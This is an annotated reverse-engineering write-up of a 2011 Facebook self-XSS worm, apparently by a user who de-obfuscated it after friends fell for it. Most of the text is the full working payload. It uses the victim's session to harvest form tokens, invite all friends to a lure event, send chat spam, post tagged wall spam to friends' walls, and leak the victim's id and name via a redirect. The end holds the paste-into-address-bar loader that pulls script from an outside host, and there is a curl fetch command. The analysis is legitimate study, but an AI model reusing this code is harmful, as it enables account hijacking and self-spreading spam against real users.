De-Obfuscation of the Facebook-Exploit
// # The exploit comes as an event invitation; it wants you to click this link
// http://www.goo gle.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaA kiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw%3 Fqw020fbs (remove spaces if interested) | |
// # The link is a redirect to ht tp: //ge rman -spy3 .bl ogsp ot.c om/ (remove spaces if interested) | |
// # you are directed to copy and paste a snippet of JS code into your address bar, see loader.js below.
// # This script was taken from iamedwards.com on 2011-04-26 | |
// this file can be downloaded by using curl with a referer and user-agent like this:
// curl -i -e "http://www.facebook.com" -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0" http://iamedwards.com/german.php?0.214 | |
// # ran it through a beautifier | |
// # ran it through a for-loop to de-obfuscate the texts like this: for (var t in _0x8a40) { document.write('"'+_0x8a40[t] + '", '); } | |
// # started commenting the _texte[xy] meanings nearby | |
// Decoded string table of the original obfuscated script. Every property access
// and literal below goes through this array (e.g. window[_texte[7]][_texte[6]]
// is window.top.location), so the index comments are the key to reading it.
// Remote hosts referenced here (lure / redirect / spam links): germancpa.blogspot.com,
// ilikeclinton.com, who-spying-u.blogspot.com, ow.ly/4GpHi, genetics.bwh.harvard.edu (spinner image).
var _texte=[ /* 0 */ "%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ ow.ly/4GpHi", // 0: chat message, %firstname% is substituted per recipient
  "Meine Top Profil-Stalker:\n %tf% - 1136 Besuche\n %tf% - 983 Besuche \n %tf% - 542 Besuche \n %tf% - 300 Besuche \n Schau dir an wer dein Profil sieht @ http://ilikeclinton.com?u28xt5ga", // 1: wall post, the four %tf% become tagged friends
  "http://germancpa.blogspot.com/", // 2: redirect target used by mf()
  "Schau dir deine Profil-Stalker an - http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaAkiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw?u28xt5ga ~~ u28xt5ga ", // 3: event description (Google redirect to the blogspot lure)
  "WOW Jetzt kannst du sehen wer sich dein Profil ansieht! (u28xt5ga)", // 4: event name
  /* 5 */ "href", "location", "top", "GET", // 5, 6, 7, 8
  "open", // 9
  /* 10 */ "onreadystatechange",
  "readyState", // 11
  "status", // 12
  "responseText", // 13
  "send", // 14
  "/", // 15
  "match", // 16
  "cookie", // 17
  "@[", // 18: start of a mention tag @[id:name]
  "id", // 19
  /* 20 */ ":",
  "name", // 21
  "]", // 22
  "", // 23: the empty string, used as the default value everywhere
  "&", // 24
  "=", // 25
  "POST", // 26
  "Content-Type", // 27
  "application/x-www-form-urlencoded", // 28
  "setRequestHeader", // 29
  /* 30 */ "div",
  "createElement", // 31
  "display", // 32
  "style", // 33
  "block", // 34
  "position", // 35
  "absolute", // 36
  "width", // 37
  "%", // 38
  "height", // 39
  /* 40 */ "left",
  "px", // 41
  "textAlign", // 42
  "center", // 43
  "padding", // 44
  "4px", // 45
  "background", // 46
  "#FFFFFF", // 47
  "zIndex", // 48
  "innerHTML", // 49
  /* 50 */ " <br>Verifiziere deinen Code - Bitte gedulde dich einen kleinen Moment.<br><br> We are processing the offer for you... <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a><br><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">", // 50: overlay markup; the link resets wf and calls mf(), i.e. forces the redirect
  "appendChild", // 51
  "body", // 52
  "data", // 53
  "firstChild", // 54
  "navAccountName", // 55: id of the element holding the logged-in user's display name
  "getElementById", // 56
  "?", // 57
  "/ajax/choose/?__a=1", // 58: typeahead token endpoint
  "event", // 59
  /* 60 */ "AsyncRequest",
  "/ajax/typeahead/first_degree.php?__a=1&viewer=", // 61: friend list (all first-degree contacts)
  "&token=", // 62
  "&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha", // 63
  "length", // 64
  "push", // 65
  "getTime", // 66
  "setTime", // 67
  "getMonth", // 68
  "getDate", // 69
  /* 70 */ "getFullYear",
  "getHours", // 71
  ",", // 72
  "join", // 73
  "on", // 74
  "Create Event", // 75
  "new", // 76
  "/events/create.php", // 77: event creation endpoint
  "/ajax/chat/buddy_list.php?__a=1", // 78: list of friends currently online
  "substr", // 79
  /* 80 */ "(",
  ")", // 81
  "buddy_list", // 82
  "payload", // 83
  "nowAvailableList", // 84
  "random", // 85
  "floor", // 86
  "%firstname%", // 87: placeholder in the chat message
  "toLowerCase", // 88
  "firstName", // 89
  /* 90 */ "userInfos",
  "replace", // 91
  "/ajax/chat/send.php?__a=1", // 92: chat send endpoint
  "/ajax/browser/friends/?uid=", // 93: friend browser page (HTML embedded in JSON)
  "&filter=all&__a=1&__d=1", // 94
  "shift", // 95
  "fetched friends: ", // 96: debug alert text
  "home", // 97: xhpc_context for the victim's own wall
  "pop", // 98
  "%tf%", // 99: placeholder in the wall post
  /* 100 */ "search",
  "xhpc_message_text", // 101
  "xhpc_message", // 102
  "message text: ", // 103: debug alert text
  "/ajax/updatestatus.php?__a=1", // 104: wall post endpoint
  "profile" // 105: xhpc_context for friends' walls
];
var chatmessage = _texte[0]; // sent over chat to every online friend
var postmessage = _texte[1]; // posted to the victim's wall and to friends' walls
var redirect = _texte[2]; // final redirect; the victim's id and name are appended further down
var eventdesc = _texte[3];
var eventname = _texte[4];
var nfriends = 5000; // upper bound on the number of wall posts made by the recursive poster
var debug = false; // when true, progress is reported via alert()
var wf = 0; // number of outstanding async jobs; mf() only redirects once it is <= 0
/** mf is used for a redirect after a short delay. It is used as a cancel-method when somebody clicks the "offer"-link
 *
 * wf counts the async jobs still running: every job does wf++ when it starts and
 * calls mf(--wf) when it finishes, so the redirect only fires once all jobs are
 * done, or once the overlay link has reset wf to 0. The argument passed by those
 * callers is ignored; mf reads only the global wf. The redirect is delayed by 500 ms.
 */
var mf = function() {
  if (wf <= 0) {
    setTimeout(function() {
      // redirecting to the url in _texte[2]. Unfortunately that url was no longer valid when i got here.
      // By this point `redirect` has been extended with "?userid=...&name=..." (see the main callback),
      // so the visit also hands the victim's Facebook id and display name to that site.
      window[_texte[7]][_texte[6]][_texte[5]] = redirect; // top / location / href
    },
    500);
  };
};
/** makes a xhr GET request to the given url. Calls callback with resulting text and callback2 without parameters
 *
 * All urls passed in are relative (e.g. "/"), so the request goes to the origin the
 * script was pasted into and the browser attaches the victim's session cookies -
 * this is how the script acts as the logged-in user.
 * _callback runs only on HTTP 200; _callback2 runs on every completed request,
 * including failures. There is no error handling and no timeout.
 */
var doget = function(url, _callback, _callback2) {
  var _xhr = new XMLHttpRequest();
  _xhr[_texte[9]](_texte[8], url); // open / GET
  _xhr[_texte[10]] = function() { // onreadystatechange
    if (_xhr[_texte[11]] == 4) { // readyState
      if (_xhr[_texte[12]] == 200 && _callback) { // status
        _callback(_xhr[_texte[13]]); // call callback with responseText
      };
      if (_callback2) {
        _callback2();
      };
    };
  };
  _xhr[_texte[14]](); // calling send() method.
};
// Entry point: GET the Facebook home page ("/") as the logged-in user and run the
// whole payload from its callback. Three independent jobs are started from there,
// each guarded by the wf counter: (1) create an event and invite every friend,
// (2) send the chat message to every online friend, (3) post to the victim's own
// wall and then, every 2 s, to one friend's wall. mf() at the end redirects once
// wf drops to 0.
// Endpoints contacted (all relative, same origin): /ajax/choose/, /ajax/typeahead/first_degree.php,
// /events/create.php, /ajax/chat/buddy_list.php, /ajax/chat/send.php, /ajax/browser/friends/,
// /ajax/updatestatus.php.
// Implicit globals (assigned without var): out, comp, datestr, timestr, mt, m.
doget(_texte[15], // "/" (yeah, a single slash)
  function(_attr1) {
    // personal learning: it never occurred to me, but since functions are regular objects
    // it's actually possible to address a function like mystring.match() in this way mystring['match']()
    /** stores the facebook user ID, retrieved from the cookie */
    // Throws (match() returns null) if there is no c_user cookie, i.e. nobody is logged in.
    var _fbUserID = document[_texte[17]][_texte[16]](/c_user=(\d+)/)[1]; // cookie, match
    /** converts an object containing "id" and "name" properties to the form of "@[id:name]", defaults to empty string */
    // This is the mention-tag syntax used in the xhpc_message field, so the friend is tagged in the post.
    var _0x93d3x11 = function(obj) {
      return obj ? _texte[18] + obj[_texte[19]] + _texte[20] + obj[_texte[21]] + _texte[22] : _texte[23];
      // return obj ? "@[" + obj["id"] + ":" + obj["name"] + "]" : ""; // if set, return @[id:name], otherwise empty string
    };
    /** returns the "name" property of a given attribute, defaults to empty string. */
    // Used for the plain-text variant of the post (xhpc_message_text).
    var _getNamePropertyOf = function(obj) {
      return obj ? obj[_texte[21]] : _texte[23]; // name, "" (empty string)
    };
    /** encodes an object for use in a url (key=encoded value, chained by &), defaults to empty string */
    // NOTE: `out` is assigned without var and leaks as a global.
    // A null value emits only the key (no "="); any other value is encodeURIComponent'ed.
    var _urlencode = function(_innerAttr1) {
      out = _texte[23]; // empty string
      for (var _key in _innerAttr1) {
        out += (out ? _texte[24] : _texte[23]) + _key + ((_innerAttr1[_key] !== null) ? _texte[25] + encodeURIComponent(_innerAttr1[_key]) : _texte[23]);
      };
      return out;
    };
    /** posts to url, sending along the given postData, compare to #doget */
    // Form-encoded POST. Every caller includes the post_form_id and fb_dtsg values
    // harvested from the home page below - presumably the per-session form tokens
    // the endpoints require, which is why the script fetches "/" first.
    var _doPost = function(url, postData, _callback, _secondCallback) {
      var _xhr = new XMLHttpRequest();
      _xhr[_texte[9]](_texte[26], url); // open, POST
      _xhr[_texte[29]](_texte[27], _texte[28]); // setting content type
      _xhr[_texte[10]] = function() {
        if (_xhr[_texte[11]] == 4) {
          if (_xhr[_texte[12]] == 200 && _callback) {
            _callback(_xhr[_texte[13]]); // call callback with responseText
          };
          if (_secondCallback) {
            _secondCallback();
          };
        };
      };
      _xhr[_texte[14]](_urlencode(postData)); // calling send() method with supplied data
    };
    /** creates the fake-user interface containing the "click here" link, starting the mf() function */
    // The div covers the whole viewport (100% x 100%, top/left 0, zIndex 999999), so the
    // victim only sees the "verifying" text and a spinner while the jobs run underneath.
    var _createOverlay = function() {
      var elem = document[_texte[31]](_texte[30]); // createElement('div')
      // styles
      elem[_texte[33]][_texte[32]] = _texte[34]; // display block
      elem[_texte[33]][_texte[35]] = _texte[36]; // position absolute
      elem[_texte[33]][_texte[37]] = 100 + _texte[38]; // w+h 100%, top+left 0,0
      elem[_texte[33]][_texte[39]] = 100 + _texte[38];
      elem[_texte[33]][_texte[40]] = 0 + _texte[41];
      elem[_texte[33]][_texte[7]] = 0 + _texte[41];
      elem[_texte[33]][_texte[42]] = _texte[43]; // textAlign center
      elem[_texte[33]][_texte[44]] = _texte[45]; // padding 4px
      elem[_texte[33]][_texte[46]] = _texte[47]; // white bg
      elem[_texte[33]][_texte[48]] = 999999; // high zIndex
      // contains the text that presents you a "click here" link which starts mf()-function. Also shows the loading-spinner.
      // clicking that link will reset the wf-counter and call mf, redirecting you to another site (apparently with a very special offer)
      // The spinner <img> is loaded from genetics.bwh.harvard.edu, an unrelated third-party host.
      elem[_texte[49]] = _texte[50];
      document[_texte[52]][_texte[51]](elem); // body.appendChild()
    };
    // Harvest the composer id and the two form tokens from the home-page HTML.
    // Only the composer id is null-checked; the regex for it expects escaped quotes (\")
    // whereas the other two expect plain quotes, so they are read from different parts of the response.
    var _0x93d3x19 = _attr1[_texte[16]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
    if (_0x93d3x19) {
      comp = _0x93d3x19[1]; // implicit global
    } else {
      comp = _texte[23];
    };
    // These two throw if the markup has changed (match() returns null, then [1] fails).
    var _0x93d3x1a = _attr1[_texte[16]](/name="post_form_id" value="([\d\w]+)"/i)[1];
    var _0x93d3x1b = _attr1[_texte[16]](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
    // The victim's display name: text of the first child of #navAccountName.
    var _0x93d3x1c = document[_texte[56]](_texte[55])[_texte[54]][_texte[53]];
    // The redirect url becomes "<redirect>?userid=<id>&name=<name>&doclose=1", so the
    // final visit leaks the victim's id and display name to the redirect site.
    redirect = redirect + _texte[57] + _urlencode({
      userid: _fbUserID,
      name: _0x93d3x1c,
      doclose: 1
    });
    _createOverlay();
    // Job 1: event invitation. eventdesc is a non-empty constant here, so this always runs.
    if (eventdesc) {
      wf++;
      // Step 1: POST /ajax/choose/ to obtain a typeahead token for type "event".
      _doPost(_texte[58], {
        type: _texte[59],
        eid: null,
        invite_message: _texte[23],
        __d: 1,
        post_form_id: _0x93d3x1a,
        fb_dtsg: _0x93d3x1b,
        lsd: null,
        post_form_id_source: _texte[60]
      },
      function(_0x93d3x1d) {
        // Token is pulled out of the (escaped) JSON response.
        var _0x93d3x1e = _0x93d3x1d[_texte[16]](/\\"token\\":\\"([^\\]+)\\"/)[1];
        // Step 2: GET the first-degree typeahead list for this viewer - i.e. all friends.
        var _0x93d3xb = _texte[61] + _fbUserID + _texte[62] + _0x93d3x1e + _texte[63];
        doget(_0x93d3xb,
          function(_0x93d3x1f) {
            // Every {"uid":N, fragment is one friend; collect the ids, skipping the victim's own.
            var _0x93d3x20 = _0x93d3x1f[_texte[16]](/\{"uid":\d+,/g);
            var _0x93d3x21 = [];
            for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) {
              var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/:(\d+),/)[1];
              if (_0x93d3x23 != _fbUserID) {
                _0x93d3x21[_texte[65]](_0x93d3x23);
              };
            };
            // Event start = now + 24 h (60*60*24*1000 ms); date as M/D/YYYY (getMonth is
            // 0-based, hence +1), time as the current hour in minutes. datestr/timestr are implicit globals.
            var _0x93d3x24 = new Date();
            _0x93d3x24[_texte[67]](_0x93d3x24[_texte[66]]() + 60 * 60 * 24 * 1000);
            datestr = (_0x93d3x24[_texte[68]]() + 1) + _texte[15] + _0x93d3x24[_texte[69]]() + _texte[15] + _0x93d3x24[_texte[70]]();
            timestr = _0x93d3x24[_texte[71]]() * 60;
            // Step 3: the event form. sgb_invitees is every friend id joined by ",";
            // privacy/guest list/posting are all "on".
            var _0x93d3x25 = {
              post_form_id: _0x93d3x1a,
              fb_dtsg: _0x93d3x1b,
              start_dateIntlDisplay: datestr,
              start_date: datestr,
              start_time_hour_min: timestr,
              name: eventname,
              place_page_id: _texte[23],
              location: _texte[23],
              street: _texte[23],
              geo_id: _texte[23],
              geo_sq: _texte[23],
              desc: eventdesc,
              sgb_invitees: _0x93d3x21[_texte[73]](_texte[72]),
              sgb_emails: _texte[23],
              sgb_message: _texte[23],
              privacy_type: _texte[74],
              guest_list: _texte[74],
              connections_can_post: _texte[74],
              save: _texte[75],
              submitting: _texte[23]
            };
            _0x93d3x25[_texte[76]] = _texte[23]; // "new": ""
            // POST /events/create.php; when it completes (any status) the job is done.
            _doPost(_texte[77], _0x93d3x25, false,
              function() {
                mf(--wf);
              });
          });
      });
    };
    // Job 2: chat spam to every friend currently online. chatmessage is a non-empty constant here.
    if (chatmessage) {
      wf++;
      // POST /ajax/chat/buddy_list.php to get the online list.
      _doPost(_texte[78], {
        user: _fbUserID,
        post_form_id: _0x93d3x1a,
        fb_dtsg: _0x93d3x1b,
        lsd: null,
        post_form_id_source: _texte[60],
        popped_out: false,
        force_render: true
      },
      function(_0x93d3x1d) {
        // Drops the first 9 characters of the response - presumably a "for (;;);"-style
        // JSON guard prefix (9 chars) - TODO confirm against a captured response.
        var _0x93d3x26 = _0x93d3x1d[_texte[79]](9);
        // NOTE: eval() of a server response - whatever the endpoint returned is executed as code here.
        var _0x93d3x27 = eval(_texte[80] + _0x93d3x26 + _texte[81]); // "(" + body + ")"
        var _0x93d3x28 = _0x93d3x27[_texte[83]][_texte[82]]; // payload.buddy_list
        // Keys of nowAvailableList are the uids of friends currently online.
        for (var _0x93d3x29 in _0x93d3x28[_texte[84]]) {
          // These three locals are never read; the same expressions are recomputed inline in the POST body below.
          var _0x93d3x2a = Math[_texte[86]](Math[_texte[85]]() * 1335448958);
          var _0x93d3x2b = (new Date())[_texte[66]]();
          var _0x93d3x2c = chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]());
          // POST /ajax/chat/send.php: random msg_id, %firstname% replaced by the
          // recipient's lower-cased first name from userInfos.
          _doPost(_texte[92], {
            msg_id: Math[_texte[86]](Math[_texte[85]]() * 1335448958),
            client_time: (new Date())[_texte[66]](),
            msg_text: chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]()),
            to: _0x93d3x29,
            post_form_id: _0x93d3x1a,
            fb_dtsg: _0x93d3x1b,
            post_form_id_source: _texte[60]
          });
        };
        // Job counts as done as soon as the sends are queued; it does not wait for their responses.
        mf(--wf);
      });
    };
    // Job 3: wall posts. postmessage is a non-empty constant here.
    if (postmessage) {
      wf++;
      // GET /ajax/browser/friends/?uid=<me>&filter=all - the friend browser page, HTML escaped inside JSON.
      doget(_texte[93] + _fbUserID + _texte[94],
        function(_0x93d3x1d) {
          // One match per friend: the "_q.jpg" thumbnail reference up to the closing </a> of the profile link.
          var _0x93d3x20 = _0x93d3x1d[_texte[16]](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
          var _0x93d3x2d = [];
          if (_0x93d3x20) {
            for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) {
              // id: the middle "_<digits>_" part of the thumbnail filename; name: the link text.
              var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/_\d+_/)[0][_texte[91]](/_/g, _texte[23]);
              var _0x93d3x2e = _0x93d3x20[_0x93d3x22][_texte[16]](/>[^>]+\\u003c\\\/a>$/i)[0][_texte[91]](/\\u003c\\\/a>$/gim, _texte[23])[_texte[91]](/>/g, _texte[23]);
              _0x93d3x2d[_texte[65]]({
                id: _0x93d3x23,
                name: _0x93d3x2e
              });
            };
          };
          // Random draw without replacement: pick an index, copy that friend into both
          // lists, then remove it (shift the first element out and drop it into the
          // vacated slot). Both lists end up with the same random order.
          // _0x93d3xd is consumed by pop() for %tf% tags, _0x93d3x2f by shift() for wall targets.
          var _0x93d3xd = [];
          var _0x93d3x2f = [];
          while (_0x93d3x2d[_texte[64]]) {
            var _0x93d3x30 = Math[_texte[86]](Math[_texte[85]]() * _0x93d3x2d[_texte[64]]);
            _0x93d3xd[_texte[65]](_0x93d3x2d[_0x93d3x30]);
            _0x93d3x2f[_texte[65]](_0x93d3x2d[_0x93d3x30]);
            var _0x93d3x2b = _0x93d3x2d[_texte[95]]();
            if (_0x93d3x30) {
              _0x93d3x2d[_0x93d3x30 - 1] = _0x93d3x2b;
            };
          };
          if (debug) {
            alert(_texte[96] + _0x93d3xd[_texte[64]]);
          };
          // Post to the victim's own wall: target = own id, context "home".
          var _0x93d3x31 = {
            post_form_id: _0x93d3x1a,
            fb_dtsg: _0x93d3x1b,
            xhpc_composerid: comp,
            xhpc_targetid: _fbUserID,
            xhpc_context: _texte[97],
            xhpc_fbx: _texte[23],
            lsd: null,
            post_form_id_source: _texte[60]
          };
          // Fill the %tf% placeholders: mt gets plain names (xhpc_message_text), m gets
          // @[id:name] mention tags (xhpc_message), so the four friends are tagged.
          // If the list runs out, pop() yields undefined and the helpers return "". mt and m are implicit globals.
          mt = postmessage;
          m = postmessage;
          while (mt[_texte[100]](_texte[99]) >= 0) {
            var _0x93d3x32 = _0x93d3xd[_texte[98]]();
            mt = mt[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x32));
            m = m[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x32));
          };
          _0x93d3x31[_texte[101]] = mt;
          _0x93d3x31[_texte[102]] = m;
          if (debug) {
            alert(_texte[103] + mt);
          };
          _doPost(_texte[104], _0x93d3x31); // POST /ajax/updatestatus.php
          // Recursive poster: every 2000 ms post the same message to the wall of the next
          // friend from _0x93d3x2f (context "profile"), tagging four more friends each time,
          // until the counter reaches 0 or the tag list is empty; then reset wf and redirect.
          var _0x93d3x33 = function(_0x93d3x15) {
            if (_0x93d3x15 == 0) {
              wf = 0;
              mf();
              return;
            };
            // Next wall target. If _0x93d3x2f were empty this would throw below (the
            // emptiness check further down only looks at _0x93d3xd, which is consumed
            // four entries per post and therefore empties first).
            var _0x93d3x34 = _0x93d3x2f[_texte[95]]();
            var _0x93d3x35 = {
              post_form_id: _0x93d3x1a,
              fb_dtsg: _0x93d3x1b,
              xhpc_composerid: comp,
              xhpc_targetid: _0x93d3x34[_texte[19]],
              xhpc_context: _texte[105],
              xhpc_fbx: 1,
              lsd: null,
              post_form_id_source: _texte[60]
            };
            var _0x93d3x36 = postmessage;
            var _0x93d3x37 = postmessage;
            if (_0x93d3xd[_texte[64]] == 0) {
              wf = 0;
              mf();
              return;
            };
            while (_0x93d3x36[_texte[100]](_texte[99]) >= 0) {
              var _0x93d3x38 = _0x93d3xd[_texte[98]]();
              _0x93d3x36 = _0x93d3x36[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x38));
              _0x93d3x37 = _0x93d3x37[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x38));
            };
            _0x93d3x35[_texte[101]] = _0x93d3x36;
            _0x93d3x35[_texte[102]] = _0x93d3x37;
            _doPost(_texte[104], _0x93d3x35);
            setTimeout(function() {
              _0x93d3x33(_0x93d3x15 - 1);
            },
            2000);
          };
          // Second increment for this job (the first was before the friends GET); starts the poster after 2 s.
          wf++;
          setTimeout(function() {
            _0x93d3x33(nfriends);
          },
          2000);
        });
    };
    // No-op while wf > 0; the actual redirect is triggered by the last job's mf(--wf).
    mf();
  });
// Loader ("loader.js"): the one line the victim is told to paste into the address bar.
// A javascript: URL runs in the page that is currently open, so this executes inside
// the victim's logged-in facebook.com tab (self-XSS). It injects a <script> whose src is
// german.php on iamedwards.com with a Math.random() cache-buster; that response is the
// payload de-obfuscated above. `a` and `b` are implicit globals.
javascript:(a=(b=document).createElement('script')).src='//iamedwards.com/german.php?'+Math.random(),b.body.appendChild(a);void(0)
// this is pretty straightforward. Create a script-node, set its source and append it to the body.
// you can't download the JS directly, you need to set the right referer or you'll be redirected to google.
Do you also have the source of the iamedwards.com/german.php file?
I was annoyed with all of my friends falling for this exploit, so I decided to reverse-engineer it.